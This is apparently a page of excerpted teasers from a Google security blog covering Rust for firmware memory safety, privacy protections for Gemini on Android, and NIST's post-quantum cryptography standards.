Memory Safety for Firmware, TodayUsing the process outlined in this blog post, You can begin to introduce Rust into large legacy firmware…

As a pioneer in responsible AI and cutting-edge privacy technologies like Private Compute Core and federated learning, we made sure our approach to the assistant experience with Gemini on Android is aligned with our existing Secure AI framework, AI Principles and Privacy Principles.

From privacy on-device when handling sensitive data to the world’s best cloud infrastructure, here are six key ways we keep your information private and protected.

For some AI features, like Summarize in Recorder on Pixel, that benefit from additional data privacy or processing efficiency, we utilize on-device AI.

It can be thought of as extending the user’s device and its security boundaries into our cloud infr…

The National Institute of Standards and Technology (NIST) just released three finalized standards for post-quantum cryptography (PQC) covering public key encapsulation and two forms of digital signatures.

Here's a brief overview of what PQC is, how Google is using PQC, and how other organizations can adopt these new standards.

Practical large-scale quantum computers are still years away, but computer scientists have known for decades that a cryptographically relevant quantum computer (CRQC) could break existing forms of asymmetric key cryptography.

Google began testing PQC in Chrome in 2016 and has been using PQC to protect internal communications since 2022.

As we make progress on our own …